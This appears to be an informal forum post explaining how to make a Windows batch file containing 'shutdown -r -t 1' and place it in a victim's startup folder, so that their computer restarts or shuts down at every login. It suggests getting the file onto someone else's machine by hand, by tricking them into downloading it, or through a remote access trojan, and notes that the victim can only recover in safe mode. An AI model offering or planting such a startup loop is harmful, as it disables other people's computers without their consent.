Code:

shutdown -r -t 1


Change the -r to a -s to make it shut down
and the -t 1 means one second so make it to any amount of seconds you want, Then once saved as a .bat file, Move it to startup folder and bam your done

No, you don't need any of their information.
You need to put it on their computer yourself or have them download it.

Theres a program, i think its called beasty or somthing, its a RAT amd you move the .bat file to there startup folder and bam there done, unless ofcourse they open there cp in safe mode
